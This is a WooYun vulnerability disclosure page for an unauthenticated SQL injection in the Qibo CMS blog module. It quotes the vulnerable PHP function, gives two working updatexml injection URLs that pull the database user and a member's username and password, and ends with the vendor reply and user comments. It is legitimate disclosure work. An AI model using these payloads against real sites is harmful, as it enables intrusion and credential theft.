当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112049

漏洞标题:齐博博客系统sql注入一枚(版本限制,部分通过)

相关厂商:齐博CMS

漏洞作者: 牛肉包子

提交时间:2015-05-05 17:08

修复时间:2015-08-06 11:34

公开时间:2015-08-06 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-11: 细节向第三方安全合作伙伴开放
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

无需登录,无需注册直接出数据。

详细说明:

无需登录,无需注册直接出数据。
--------------------------------------------------------------------------------------
看到
/blog/template/space/file/listbbs.php

function get_listbbs($rows){
	global $db,$uid,$TB_pre,$Mrows,$page,$Morder,$Mdesc,$webdb,$VlogCfg;
	$VlogCfg[content_leng]==0 && $VlogCfg[content_leng]=120;
	if($page<1){
		$page=1;
	}
	$min=($page-1)*$rows;
	$albumid && $SQL=" AND albumid='$albumid' ";
	$Mdesc[listbbs] || $Mdesc[listbbs]='DESC';
	$Morder[listbbs] || $Morder[listbbs]="tid";
	$query = $db->query("SELECT T.*,C.* FROM {$TB_pre}threads T LEFT JOIN {$TB_pre}tmsgs C ON T.tid=C.tid WHERE T.authorid='$uid' ORDER BY T.$Morder[listbbs] $Mdesc[listbbs] LIMIT $min,$rows");
	while($rs = $db->fetch_array($query)){
		$rs[postdate]=date("Y-m-d H:i",$rs[postdate]);
		if($VlogCfg[content_leng]>0){
			$rs[content]=@preg_replace('/<([^>]*)>/is',"",$rs[content]);	//把HTML代码过滤掉
			$rs[content]=get_word($rs[content],$VlogCfg[content_leng]);
		}else{
			$rs[content]='';
		}
		$listdb[]=$rs;
	}
	return $listdb;
}


这个函数中的$TB_pre未初始化,然后根据齐博系统的伪全局变量注册。然后造成sql注入。
可以构造

http://127.0.0.1/qibo_blog/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=qb_module where 1=1 or updatexml(2,concat(0x7e,(user())),0) %23


1.png


然后构造

http://127.0.0.1/qibo_blog/blog/index.php?file=listbbs&uid=1'&id=1&TB_pre=qb_module where 1=1 or updatexml(2,concat(0x7e,((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23


2.png


demo测试

2.png

漏洞证明:

2.png

修复方案:

初始化

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-08 11:34

厂商回复:

这个问题之前有人提出来了。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-05 17:12 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    mark

  2. 2015-05-05 17:15 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    看看。

  3. 2015-05-05 17:27 | prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)

    你的通用怎么都没钱。。

  4. 2015-05-05 17:52 | 孤独行者 ( 普通白帽子 | Rank:110 漏洞数:44 | 时光如水,总是无言。你若安好,便是晴天)

    你的 通用怎么都没钱。

  5. 2015-05-05 17:56 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    番茄湿父你的通用怎么都没$

  6. 2015-05-05 18:27 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    因为还没到发钱的时候

  7. 2015-05-05 19:59 | Xser ( 普通白帽子 | Rank:194 漏洞数:61 | JDSec)

    code 区域http://127.0.0.1/qibo_blog/blog/index.php?file=listbbs&uid=1'&id=1&TB_pre=qb_module where 1=1 or updatexml(2,concat(0x7e,((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23 为什么我看到了详细

  8. 2015-05-05 20:08 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    又出BUG咯。。。

  9. 2015-05-05 20:10 | 孤独行者 ( 普通白帽子 | Rank:110 漏洞数:44 | 时光如水,总是无言。你若安好,便是晴天)

    又出bug咯

  10. 2015-05-05 23:02 | 小飞 ( 实习白帽子 | Rank:37 漏洞数:12 | 挖洞对于16岁的我来说实在是太艰难了!10...)

    为啥我能看到详细

  11. 2015-05-05 23:02 | prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)

    为啥我能看到详细

  12. 2015-05-05 23:16 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    我也看到了。。

  13. 2015-05-05 23:51 | thewind ( 实习白帽子 | Rank:41 漏洞数:6 | 小白……)

    为什么状态是未审核,我就看到详细了·······

  14. 2015-05-06 08:57 | 平底斜 ( 路人 | Rank:12 漏洞数:2 | 性骄奢,好声色,为文有汉魏风)

    好神奇,我竟然看到了

  15. 2015-08-06 13:29 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    伪全局

  16. 2015-09-11 17:12 | 康小泡 ( 路人 | Rank:0 漏洞数:1 | 掉个offer给我吧)

    爷爷带我搞站